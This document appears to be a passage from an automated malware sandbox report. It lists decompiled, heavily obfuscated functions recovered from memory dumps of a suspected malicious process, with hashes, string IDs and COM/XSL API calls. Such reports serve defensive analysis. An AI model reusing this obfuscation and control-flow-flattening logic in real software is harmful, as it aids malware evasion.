                                          				 *(_t382 + 0x14) = 0xc073;
                                          				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0xffffd37e;
                                          				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 3;
                                          				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 4;
                                          				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x0049a7c7;
                                          				 *(_t382 + 0x94) = 0xf1be;
                                          				_t337 =  *((intOrPtr*)(_t382 + 0xa0));
                                          				_t344 = 0xa;
                                          				 *(_t382 + 0x94) =  *(_t382 + 0x94) / _t344;
                                          				 *(_t382 + 0x94) =  *(_t382 + 0x94) ^ 0x00002403;
                                          				 *(_t382 + 0x60) = 0x96ef;
                                          				 *(_t382 + 0x60) =  *(_t382 + 0x60) + 0xfa48;
                                          				 *(_t382 + 0x60) =  *(_t382 + 0x60) | 0xbd3809b4;
                                          				 *(_t382 + 0x60) =  *(_t382 + 0x60) ^ 0xbd39967f;
                                          				 *(_t382 + 0x38) = 0xec0c;
                                          				 *(_t382 + 0x38) =  *(_t382 + 0x38) + 0x6908;
                                          				 *(_t382 + 0x38) =  *(_t382 + 0x38) * 0x26;
                                          				 *(_t382 + 0x38) =  *(_t382 + 0x38) >> 9;
                                          				 *(_t382 + 0x38) =  *(_t382 + 0x38) ^ 0x00001f14;
                                          				do {
                                          					while(_t376 != 0x3ac0a14) {
                                          						if(_t376 == 0x7fec1df) {
                                          							_t344 = _t382 + 0x2ac;
                                          							E006D0D33(_t382 + 0x2ac,  *(_t382 + 0x48), __eflags,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x14),  *((intOrPtr*)(_t382 + 0x24)));
                                          							_t382 = _t382 + 0xc;
                                          							_t376 = 0x12c07630;
                                          							continue;
                                          						} else {
                                          							if(_t376 == 0x12c07630) {
                                          								_push( *(_t382 + 0x1c));
                                          								E006C29E3(_t382 + 0x2b0, 0x104, E006D889D( *((intOrPtr*)(_t382 + 0x4b8)),  *(_t382 + 0x58), __eflags),  *(_t382 + 0x5c),  *(_t382 + 0x74),  *(_t382 + 0x94),  *((intOrPtr*)(_t382 + 0xac)),  *((intOrPtr*)(_t382 + 0x4c4)),  *(_t382 + 0x54),  *(_t382 + 0x94));
                                          								_t344 =  *(_t382 + 0x5c);
                                          								E006D2025( *(_t382 + 0x5c), _t327,  *((intOrPtr*)(_t382 + 0xc4)),  *((intOrPtr*)(_t382 + 0x70)));
                                          								_t382 = _t382 + 0x30;
                                          								_t376 = 0x3ac0a14;
                                          								continue;
                                          							} else {
                                          								if(_t376 == 0x1f5a6ea2) {
                                          									_t376 = 0x2b635c32;
                                          									continue;
                                          								} else {
                                          									if(_t376 == 0x2b635c32) {
                                          										E006D3E3F(_t344, _t382 + 0xa4, __eflags,  *(_t382 + 0x68),  *((intOrPtr*)(_t382 + 0x70)));
                                          										_t331 = E006C28CE(_t382 + 0xac,  *(_t382 + 0x50),  *(_t382 + 0x80));
                                          										_t382 = _t382 + 0xc;
                                          										_t376 = 0x7fec1df;
                                          										_t344 = 0;
                                          										 *_t331 = 0;
                                          										continue;
                                          									} else {
                                          										if(_t376 == 0x2c9ad714) {
                                          											E006D4F7D( *(_t382 + 0x60),  *(_t382 + 0x38), _t337);
                                          										} else {
                                          											if(_t376 != 0x33ecfade) {
                                          												goto L16;
                                          											} else {
                                          												_t263 = _t380 + 4; // 0xedb0bf04
                                          												E006D6CAA( *(_t382 + 0x4c),  *((intOrPtr*)(_t382 + 0xa0)), _t337, _t263,  *(_t382 + 0x64),  *_t380,  *(_t382 + 0x20), _t344,  *_t263,  *(_t382 + 0x94));
                                          												_t382 = _t382 + 0x20;
                                          												_t344 = 1;
                                          												_t376 = 0x2c9ad714;
                                          												_t373 =  !=  ? 1 : _t373;
                                          												continue;
                                          											}
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						L19:
                                          						return _t373;
                                          					}
                                          					_t325 = E006CB566(_t344, 0,  *((intOrPtr*)(_t382 + 0xb8)),  *(_t382 + 0x58),  *((intOrPtr*)(_t382 + 0xa8)),  *(_t382 + 0x48), _t344,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x90),  *((intOrPtr*)(_t382 + 0x84)),  *(_t382 + 0x2c),  *(_t382 + 0x74),  *(_t382 + 0x1c),  *((intOrPtr*)(_t382 + 0x4b8)));
                                          					_t337 = _t325;
                                          					_t382 = _t382 + 0x30;
                                          					__eflags = _t325 - 0xffffffff;
                                          					if(__eflags == 0) {
                                          						_t376 = 0x18af80d5;
                                          						goto L16;
                                          					} else {
                                          						_t376 = 0x33ecfade;
                                          						continue;
                                          					}
                                          					goto L19;
                                          					L16:
                                          					__eflags = _t376 - 0x18af80d5;
                                          				} while (__eflags != 0);
                                          				goto L19;
                                          			}














                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: ,$0$2X$2\c+$2\c+$At$EZX-$Q#JK$Ui=
                                          • API String ID: 2962429428-1096774584
                                          • Opcode ID: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
                                          • Instruction ID: bdb47491ff62bd602baa6367c20d2685c25a50681857700204554caef834244c
                                          • Opcode Fuzzy Hash: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
                                          • Instruction Fuzzy Hash: 46F110725083809FD368CF65C48AA5BFBE2BBC4748F10891DF1DA962A0C7B58949CF47
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E006D26F5(intOrPtr __ecx, intOrPtr* __edx) {
                                          				intOrPtr _v4;
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				signed int _v88;
                                          				void* __edi;
                                          				void* __ebp;
                                          				intOrPtr _t199;
                                          				intOrPtr _t201;
                                          				void* _t202;
                                          				intOrPtr _t204;
                                          				intOrPtr _t208;
                                          				intOrPtr _t209;
                                          				intOrPtr* _t210;
                                          				signed int _t212;
                                          				signed int _t213;
                                          				signed int _t214;
                                          				signed int _t215;
                                          				void* _t216;
                                          				void* _t224;
                                          				void* _t237;
                                          				intOrPtr _t241;
                                          				void* _t242;
                                          				intOrPtr _t246;
                                          				signed int* _t247;
                                          
                                          				_t247 =  &_v88;
                                          				_v12 = 0x29be25;
                                          				_v8 = 0x714c58;
                                          				_t241 = 0;
                                          				_t210 = __edx;
                                          				_v4 = 0;
                                          				_v28 = 0x1199;
                                          				_t246 = __ecx;
                                          				_v28 = _v28 + 0xffffe920;
                                          				_t242 = 0x2efb68f6;
                                          				_v28 = _v28 ^ 0xffffad72;
                                          				_v32 = 0x5bb2;
                                          				_t212 = 0x22;
                                          				_v32 = _v32 / _t212;
                                          				_v32 = _v32 ^ 0x00002aec;
                                          				_v56 = 0xeb34;
                                          				_t213 = 0x1b;
                                          				_v56 = _v56 * 0x6a;
                                          				_v56 = _v56 + 0x2965;
                                          				_v56 = _v56 ^ 0x0061feda;
                                          				_v84 = 0xfe4e;
                                          				_v84 = _v84 + 0xd2a6;
                                          				_v84 = _v84 >> 3;
                                          				_v84 = _v84 | 0x3d0bc2c6;
                                          				_v84 = _v84 ^ 0x3d0bc81e;
                                          				_v20 = 0x5db0;
                                          				_v20 = _v20 + 0xffffd438;
                                          				_v20 = _v20 ^ 0x00005602;
                                          				_v24 = 0xa932;
                                          				_v24 = _v24 * 0x1f;
                                          				_v24 = _v24 ^ 0x00145068;
                                          				_v88 = 0xc29f;
                                          				_v88 = _v88 * 0x34;
                                          				_v88 = _v88 ^ 0xcbbf1de0;
                                          				_v88 = _v88 + 0x67bb;
                                          				_v88 = _v88 ^ 0xcb98f8b4;
                                          				_v36 = 0x7c84;
                                          				_v36 = _v36 + 0x6da7;
                                          				_v36 = _v36 ^ 0x0000df84;
                                          				_v60 = 0xf0d8;
                                          				_v60 = _v60 + 0xffffcb07;
                                          				_v60 = _v60 * 0x50;
                                          				_v60 = _v60 ^ 0x003a95e0;
                                          				_v44 = 0x6681;
                                          				_v44 = _v44 + 0xffff19d2;
                                          				_v44 = _v44 / _t213;
                                          				_v44 = _v44 ^ 0x097b3a7d;
                                          				_v16 = 0x94d;
                                          				_v16 = _v16 + 0x4187;
                                          				_v16 = _v16 ^ 0x00007836;
                                          				_v48 = 0x21e9;
                                          				_v48 = _v48 ^ 0x3c92a0ae;
                                          				_v48 = _v48 + 0xf596;
                                          				_v48 = _v48 ^ 0x3c9366ad;
                                          				_v52 = 0x4a04;
                                          				_v52 = _v52 * 0x54;
                                          				_v52 = _v52 ^ 0x56a39f58;
                                          				_v52 = _v52 ^ 0x56bbe121;
                                          				_v80 = 0x166f;
                                          				_v80 = _v80 ^ 0x3bc38db2;
                                          				_v80 = _v80 << 0xd;
                                          				_v80 = _v80 | 0x5d8ccce3;
                                          				_v80 = _v80 ^ 0x7fffd756;
                                          				_v76 = 0xd2e;
                                          				_t214 = 6;
                                          				_v76 = _v76 / _t214;
                                          				_t215 = 0x59;
                                          				_t237 = 0xdd7d922;
                                          				_v76 = _v76 / _t215;
                                          				_v76 = _v76 ^ 0xb1a59fe6;
                                          				_v76 = _v76 ^ 0xb1a5c97b;
                                          				_v40 = 0x2ae1;
                                          				_v40 = _v40 >> 6;
                                          				_v40 = _v40 << 2;
                                          				_v40 = _v40 ^ 0x0000341b;
                                          				_v64 = 0x37cd;
                                          				_v64 = _v64 + 0xffff3540;
                                          				_v64 = _v64 << 1;
                                          				_v64 = _v64 | 0x66261fef;
                                          				_v64 = _v64 ^ 0xfffeb931;
                                          				_v68 = 0x9ed9;
                                          				_v68 = _v68 + 0xad09;
                                          				_v68 = _v68 ^ 0xfd9e5c2b;
                                          				_v68 = _v68 >> 4;
                                          				_v68 = _v68 ^ 0x0fd99075;
                                          				_v72 = 0x1a2d;
                                          				_v72 = _v72 + 0xc4a4;
                                          				_v72 = _v72 << 6;
                                          				_v72 = _v72 * 0x59;
                                          				_v72 = _v72 ^ 0x135ddffd;
                                          				while(1) {
                                          					L1:
                                          					_t216 = 0x2c1c6573;
                                          					while(_t242 != 0x6072d1c) {
                                          						if(_t242 == _t237) {
                                          							_push(_t216);
                                          							_t199 = E006C1132(_v44, _t216, _v16, _t216, _t241, _v48, _v52, _v80, E006C2A30);
                                          							_t247 =  &(_t247[9]);
                                          							 *((intOrPtr*)(_t241 + 0x1c)) = _t199;
                                          							__eflags = _t199;
                                          							_t216 = 0x2c1c6573;
                                          							_t242 =  !=  ? 0x2c1c6573 : 0x6072d1c;
                                          							L13:
                                          							_t237 = 0xdd7d922;
                                          							continue;
                                          						}
                                          						if(_t242 == 0xe9e2879) {
                                          							_push(_v24);
                                          							_t201 = E006D6DB9( *((intOrPtr*)(_t210 + 4)), _t241, _t246, __eflags, _t216,  *_t210, _v84, _v20);
                                          							_t247 =  &(_t247[5]);
                                          							 *((intOrPtr*)(_t241 + 0x28)) = _t201;
                                          							__eflags = _t201;
                                          							_t202 = 0x303a6ade;
                                          							_t242 =  !=  ? 0x303a6ade : 0x28cfd81a;
                                          							L12:
                                          							_t216 = 0x2c1c6573;
                                          							goto L13;
                                          						}
                                          						if(_t242 == 0x28cfd81a) {
                                          							return E006CF536(_v64, _v68, _v72, _t241);
                                          						}
                                          						if(_t242 == _t216) {
                                          							 *((intOrPtr*)(_t241 + 0x24)) = _t246;
                                          							_t204 =  *0x6dca24; // 0x0
                                          							 *((intOrPtr*)(_t241 + 0x2c)) = _t204;
                                          							 *0x6dca24 = _t241;
                                          							return _t204;
                                          						}
                                          						if(_t242 != 0x2efb68f6) {
                                          							if(_t242 != _t202) {
                                          								L17:
                                          								__eflags = _t242 - 0x35b12720;
                                          								if(__eflags != 0) {
                                          									continue;
                                          								} else {
                                          									return _t202;
                                          								}
                                          								L22:
                                          							} else {
                                          								_t209 = E006C76DB( *((intOrPtr*)(_t241 + 0x28)), _v88, _v36, _v60);
                                          								_t247 =  &(_t247[2]);
                                          								 *((intOrPtr*)(_t241 + 4)) = _t209;
                                          								_t237 = 0xdd7d922;
                                          								_t242 =  !=  ? 0xdd7d922 : 0x6072d1c;
                                          								goto L1;
                                          							}
                                          						}
                                          						_push(_t216);
                                          						_push(_t216);
                                          						_t224 = 0x38;
                                          						_t208 = E006C8736(_t224);
                                          						_t241 = _t208;
                                          						__eflags = _t241;
                                          						if(__eflags != 0) {
                                          							_t242 = 0xe9e2879;
                                          							_t202 = 0x303a6ade;
                                          							goto L12;
                                          						}
                                          						return _t208;
                                          						goto L22;
                                          					}
                                          					E006D422C(_v76,  *((intOrPtr*)(_t241 + 0x28)), _v40);
                                          					_t242 = 0x28cfd81a;
                                          					_t216 = 0x2c1c6573;
                                          					_t237 = 0xdd7d922;
                                          					goto L17;
                                          				}
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: .$4$6x$XLq$e)$}:{$!$*$*
                                          • API String ID: 0-323616845
                                          • Opcode ID: 6dc6bdc14fd99ec38e3d6b927cae69fba899d704fb87829e3752f92676f3624b
                                          • Instruction ID: aef718989276987c902b9afc98ffac97f3519551e49f953d980cb2c179572ec7
                                          • Opcode Fuzzy Hash: 6dc6bdc14fd99ec38e3d6b927cae69fba899d704fb87829e3752f92676f3624b
                                          • Instruction Fuzzy Hash: B6A153719083429FD368CF25C88950BFBE2FBD4754F104A1EF1999A260D3B5CA49CF46
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E006D63C1() {
                                          				intOrPtr _v4;
                                          				intOrPtr _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				void* _t166;
                                          				signed int _t167;
                                          				signed int _t168;
                                          				void* _t173;
                                          				void* _t191;
                                          				intOrPtr _t196;
                                          				signed int _t197;
                                          				signed int _t198;
                                          				signed int _t199;
                                          				signed int _t200;
                                          				signed int _t201;
                                          				intOrPtr _t202;
                                          				intOrPtr* _t203;
                                          				signed int _t204;
                                          				signed int* _t205;
                                          
                                          				_t205 =  &_v76;
                                          				_v8 = 0x6b5f41;
                                          				_t196 = 0;
                                          				_t173 = 0x1e312b00;
                                          				_v4 = 0;
                                          				_v40 = 0xbf50;
                                          				_v40 = _v40 + 0xffff4d7d;
                                          				_v40 = _v40 ^ 0x1ff0eb0a;
                                          				_v40 = _v40 ^ 0x1ff1e7c7;
                                          				_v68 = 0xcba5;
                                          				_v68 = _v68 + 0xffffed4d;
                                          				_v68 = _v68 >> 9;
                                          				_v68 = _v68 | 0x05a9bf19;
                                          				_v68 = _v68 ^ 0x05a9faf6;
                                          				_v52 = 0xab70;
                                          				_v52 = _v52 + 0xffff3c3f;
                                          				_v52 = _v52 ^ 0x3be47de3;
                                          				_v52 = _v52 ^ 0xc41b8c81;
                                          				_v20 = 0x4c56;
                                          				_t27 =  &_v20; // 0x4c56
                                          				_t197 = 0x53;
                                          				_v20 =  *_t27 / _t197;
                                          				_v20 = _v20 ^ 0x00006ba4;
                                          				_v44 = 0x4e4f;
                                          				_v44 = _v44 + 0xffff1389;
                                          				_v44 = _v44 ^ 0x6e1bb2f9;
                                          				_v44 = _v44 ^ 0x91e4a702;
                                          				_v48 = 0x9b6d;
                                          				_t198 = 0x15;
                                          				_v48 = _v48 / _t198;
                                          				_v48 = _v48 << 0xe;
                                          				_v48 = _v48 ^ 0x01d9d03e;
                                          				_v16 = 0x7c52;
                                          				_t199 = 0x3a;
                                          				_v16 = _v16 * 0x14;
                                          				_v16 = _v16 ^ 0x0009e5e2;
                                          				_v64 = 0x462a;
                                          				_v64 = _v64 ^ 0x0e1a4a8f;
                                          				_v64 = _v64 >> 3;
                                          				_v64 = _v64 >> 0xc;
                                          				_v64 = _v64 ^ 0x000014fb;
                                          				_v72 = 0x5cc4;
                                          				_v72 = _v72 / _t199;
                                          				_v72 = _v72 + 0x2f24;
                                          				_v72 = _v72 + 0xd2bc;
                                          				_v72 = _v72 ^ 0x000179b4;
                                          				_v24 = 0x30ff;
                                          				_t200 = 0x2a;
                                          				_v24 = _v24 / _t200;
                                          				_v24 = _v24 ^ 0x00007cf0;
                                          				_v28 = 0x85cd;
                                          				_v28 = _v28 ^ 0xf8a4d4b8;
                                          				_v28 = _v28 ^ 0xf8a43927;
                                          				_v76 = 0x1878;
                                          				_v76 = _v76 ^ 0x7099aca3;
                                          				_v76 = _v76 ^ 0x4acb853d;
                                          				_v76 = _v76 + 0xffff4ab7;
                                          				_v76 = _v76 ^ 0x3a511503;
                                          				_v32 = 0x1800;
                                          				_v32 = _v32 << 1;
                                          				_v32 = _v32 ^ 0x00002132;
                                          				_v60 = 0xa25b;
                                          				_v60 = _v60 * 0x67;
                                          				_v60 = _v60 + 0x9ac4;
                                          				_v60 = _v60 ^ 0x004180d5;
                                          				_v36 = 0x47a4;
                                          				_v36 = _v36 << 9;
                                          				_v36 = _v36 ^ 0xcd228633;
                                          				_v36 = _v36 ^ 0xcdadbf4b;
                                          				_v12 = 0xe30d;
                                          				_v12 = _v12 << 8;
                                          				_v12 = _v12 ^ 0x00e3661f;
                                          				_t172 = _v12;
                                          				_t204 = _v12;
                                          				_t201 = _v12;
                                          				_v56 = 0x2740;
                                          				_v56 = _v56 ^ 0x239771de;
                                          				_v56 = _v56 + 0xfffffe7e;
                                          				_v56 = _v56 ^ 0x23985523;
                                          				while(1) {
                                          					L1:
                                          					_t191 = 0x5c;
                                          					while(1) {
                                          						L2:
                                          						do {
                                          							L3:
                                          							while(_t173 != 0x3fc1d7) {
                                          								if(_t173 == 0x353ab5a) {
                                          									_t202 =  *0x6dca2c; // 0x248300
                                          									_t203 = _t202 + 0x230;
                                          									while( *_t203 != _t191) {
                                          										_t203 = _t203 + 2;
                                          									}
                                          									_t201 = _t203 + 2;
                                          									_t173 = 0x6fcf9e2;
                                          									goto L2;
                                          								} else {
                                          									if(_t173 == 0x6adc8a5) {
                                          										_t167 = E006CF65F(_v40, _v44, _v48, _v16, _t201, _t172, _v64);
                                          										_t205 =  &(_t205[5]);
                                          										_t204 = _t167;
                                          										_t166 = 0xd265085;
                                          										_t173 =  !=  ? 0xd265085 : 0x3fc1d7;
                                          										_t191 = 0x5c;
                                          										continue;
                                          									} else {
                                          										if(_t173 == 0x6fcf9e2) {
                                          											_t168 = E006C2959(_t173, _v68, _v52, _v20, _v56);
                                          											_t172 = _t168;
                                          											_t205 =  &(_t205[4]);
                                          											if(_t168 != 0) {
                                          												_t173 = 0x6adc8a5;
                                          												goto L1;
                                          											}
                                          										} else {
                                          											if(_t173 == _t166) {
                                          												E006D507B(_v72, _v24, _v28, _v76, _t204);
                                          												_t205 =  &(_t205[3]);
                                          												_t196 =  !=  ? 1 : _t196;
                                          												_t173 = 0x17a504e8;
                                          												while(1) {
                                          													L1:
                                          													_t191 = 0x5c;
                                          													goto L2;
                                          												}
                                          											} else {
                                          												if(_t173 == 0x17a504e8) {
                                          													E006C5FB2(_v32, _v60, _t204);
                                          													_t173 = 0x3fc1d7;
                                          													while(1) {
                                          														L1:
                                          														_t191 = 0x5c;
                                          														L2:
                                          														goto L3;
                                          													}
                                          												} else {
                                          													if(_t173 != 0x1e312b00) {
                                          														goto L21;
                                          													} else {
                                          														_t173 = 0x353ab5a;
                                          														continue;
                                          													}
                                          												}
                                          											}
                                          										}
                                          									}
                                          								}
                                          								goto L22;
                                          							}
                                          							E006C5FB2(_v36, _v12, _t172);
                                          							_t173 = 0x26181ebc;
                                          							_t166 = 0xd265085;
                                          							_t191 = 0x5c;
                                          							L21:
                                          						} while (_t173 != 0x26181ebc);
                                          						L22:
                                          						return _t196;
                                          					}
                                          				}
                                          			}






































                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $/$*F$2!$@'$A_k$ON$R|$VLA_k$};
                                          • API String ID: 0-175875280
                                          • Opcode ID: 0c4f5b7f6969663be1f2afb8e548c8e6ae8d311b9b32f3d68a4793773c2d4130
                                          • Instruction ID: 830fd4ff3c170bceed103b41e870b9a2d95b0990d8b200e38249213d9a3a410c
                                          • Opcode Fuzzy Hash: 0c4f5b7f6969663be1f2afb8e548c8e6ae8d311b9b32f3d68a4793773c2d4130
                                          • Instruction Fuzzy Hash: 4E8176715083809BD798CF25C49A82FBBF2FBC4358F504A1DF686462A0C7B5CA49CB87
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E006D2349(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
                                          				char _v16;
                                          				char _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				void* _t153;
                                          				void* _t168;
                                          				signed int _t172;
                                          				char _t177;
                                          				signed int _t178;
                                          				void* _t181;
                                          				char* _t186;
                                          				signed int _t206;
                                          				signed int _t207;
                                          				signed int _t208;
                                          				signed int _t209;
                                          				signed int _t210;
                                          				signed int* _t214;
                                          
                                          				_push(_a16);
                                          				_push(0x40);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006C602B(_t153);
                                          				_v20 = 0x10;
                                          				_t214 =  &(( &_v80)[6]);
                                          				_v60 = 0xafa2;
                                          				_v60 = _v60 ^ 0xad7cd4b0;
                                          				_t178 = 0;
                                          				_v60 = _v60 | 0x7a339cd1;
                                          				_t181 = 0x15b39dc0;
                                          				_v60 = _v60 ^ 0xff7ff485;
                                          				_v64 = 0xe220;
                                          				_v64 = _v64 >> 2;
                                          				_v64 = _v64 | 0x618d1066;
                                          				_v64 = _v64 ^ 0x618d4123;
                                          				_v28 = 0xfe94;
                                          				_t206 = 0x17;
                                          				_v28 = _v28 / _t206;
                                          				_v28 = _v28 ^ 0x000043c3;
                                          				_v32 = 0x6fe3;
                                          				_v32 = _v32 >> 1;
                                          				_v32 = _v32 ^ 0x000078b7;
                                          				_v36 = 0x3688;
                                          				_t207 = 0x69;
                                          				_v36 = _v36 * 0x5a;
                                          				_v36 = _v36 ^ 0x00137d17;
                                          				_v24 = 0x8157;
                                          				_v24 = _v24 | 0x6dbfc3a0;
                                          				_v24 = _v24 ^ 0x6dbfb45a;
                                          				_v80 = 0xe945;
                                          				_v80 = _v80 / _t207;
                                          				_v80 = _v80 ^ 0xcc46d226;
                                          				_t208 = 0x62;
                                          				_v80 = _v80 / _t208;
                                          				_v80 = _v80 ^ 0x0215c355;
                                          				_v48 = 0x42ef;
                                          				_v48 = _v48 + 0xffff3840;
                                          				_v48 = _v48 << 4;
                                          				_v48 = _v48 ^ 0xfff789fd;
                                          				_v72 = 0xbf2b;
                                          				_v72 = _v72 | 0xc326a1c7;
                                          				_t209 = 0x4b;
                                          				_v72 = _v72 / _t209;
                                          				_v72 = _v72 | 0xd12f9700;
                                          				_v72 = _v72 ^ 0xd3bfbe8a;
                                          				_v52 = 0xfa61;
                                          				_v52 = _v52 << 3;
                                          				_v52 = _v52 + 0x5488;
                                          				_v52 = _v52 ^ 0x00084626;
                                          				_v56 = 0xb5dc;
                                          				_v56 = _v56 | 0x6ca6e5ac;
                                          				_v56 = _v56 * 0x5e;
                                          				_v56 = _v56 ^ 0xe54e28a7;
                                          				_v76 = 0xbf9d;
                                          				_v76 = _v76 + 0xdb7b;
                                          				_v76 = _v76 + 0xffff5618;
                                          				_v76 = _v76 | 0xc179f847;
                                          				_v76 = _v76 ^ 0xc1798349;
                                          				_v40 = 0xd8e6;
                                          				_v40 = _v40 + 0x2ceb;
                                          				_v40 = _v40 + 0x406a;
                                          				_v40 = _v40 ^ 0x0001168e;
                                          				_v68 = 0x1b9c;
                                          				_t210 = 0x7a;
                                          				_v68 = _v68 * 0x38;
                                          				_v68 = _v68 + 0xa456;
                                          				_v68 = _v68 >> 0xe;
                                          				_v68 = _v68 ^ 0x00002836;
                                          				_v44 = 0x7a08;
                                          				_v44 = _v44 << 0xd;
                                          				_v44 = _v44 / _t210;
                                          				_v44 = _v44 ^ 0x00205e6a;
                                          				while(_t181 != 0x12ef740) {
                                          					if(_t181 == 0x13e246ff) {
                                          						__eflags = _v16;
                                          						_t186 =  &_v16;
                                          						while(__eflags != 0) {
                                          							_t177 =  *_t186;
                                          							__eflags = _t177 - 0x30;
                                          							if(_t177 < 0x30) {
                                          								L11:
                                          								__eflags = _t177 - 0x61;
                                          								if(_t177 < 0x61) {
                                          									L13:
                                          									__eflags = _t177 - 0x41;
                                          									if(_t177 < 0x41) {
                                          										L15:
                                          										 *_t186 = 0x58;
                                          									} else {
                                          										__eflags = _t177 - 0x5a;
                                          										if(_t177 > 0x5a) {
                                          											goto L15;
                                          										}
                                          									}
                                          								} else {
                                          									__eflags = _t177 - 0x7a;
                                          									if(_t177 > 0x7a) {
                                          										goto L13;
                                          									}
                                          								}
                                          							} else {
                                          								__eflags = _t177 - 0x39;
                                          								if(_t177 > 0x39) {
                                          									goto L11;
                                          								}
                                          							}
                                          							_t186 = _t186 + 1;
                                          							__eflags =  *_t186;
                                          						}
                                          						_t181 = 0x12ef740;
                                          						continue;
                                          					} else {
                                          						if(_t181 == 0x15b39dc0) {
                                          							_t181 = 0x3a71512f;
                                          							continue;
                                          						} else {
                                          							if(_t181 != 0x3a71512f) {
                                          								L19:
                                          								__eflags = _t181 - 0x2b24b5a2;
                                          								if(__eflags != 0) {
                                          									continue;
                                          								}
                                          							} else {
                                          								if(E006C602C(_v60,  &_v16,  &_v20, _v64) != 0) {
                                          									_t181 = 0x13e246ff;
                                          									continue;
                                          								}
                                          							}
                                          						}
                                          					}
                                          					return _t178;
                                          				}
                                          				_push(0x6dc030);
                                          				_push(_v36);
                                          				_t168 = E006D878F(_v28, _v32, __eflags);
                                          				E006D31E2(__eflags);
                                          				_t143 =  &_v56; // 0x205e6a
                                          				_t172 = E006D6A65(_v48, __eflags,  &_v16, _v72, _a16, 0x40, _t168, _v52,  *_t143, _v76);
                                          				__eflags = _t172;
                                          				_t152 = _t172 > 0;
                                          				__eflags = _t152;
                                          				_t178 = 0 | _t152;
                                          				E006D2025(_v40, _t168, _v68, _v44);
                                          				_t214 =  &(_t214[0xc]);
                                          				_t181 = 0x2b24b5a2;
                                          				goto L19;
                                          			}


                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $/Qq:$/Qq:$6($E$j@$j^ $j^ $o
                                          • API String ID: 0-892457230
                                          • Opcode ID: 9daf9bc43cce3806ffad4262b8ad2d2643755621c33937d6d693b273a14329ad
                                          • Instruction ID: 1c526b9858b783da849466794dfa5e92677b13e93efd3ca61db67eb1156139b2
                                          • Opcode Fuzzy Hash: 9daf9bc43cce3806ffad4262b8ad2d2643755621c33937d6d693b273a14329ad
                                          • Instruction Fuzzy Hash: 278199719093429FD758CF25D99695FBBE2BBC0B18F40490EF181962A0D7B5C90ACF47
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SysAllocString.OLEAUT32(<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding="), ref: 10002D7F
                                          • CoCreateInstance.OLE32(1000D4B0,00000000,00000001,1000D4C0,?), ref: 10002DB0
                                          • PropVariantClear.OLE32(?), ref: 10002E75
                                          • SysFreeString.OLEAUT32(00000000), ref: 10002E7E
                                          • SysFreeString.OLEAUT32(00000000), ref: 10002E97
                                          Strings
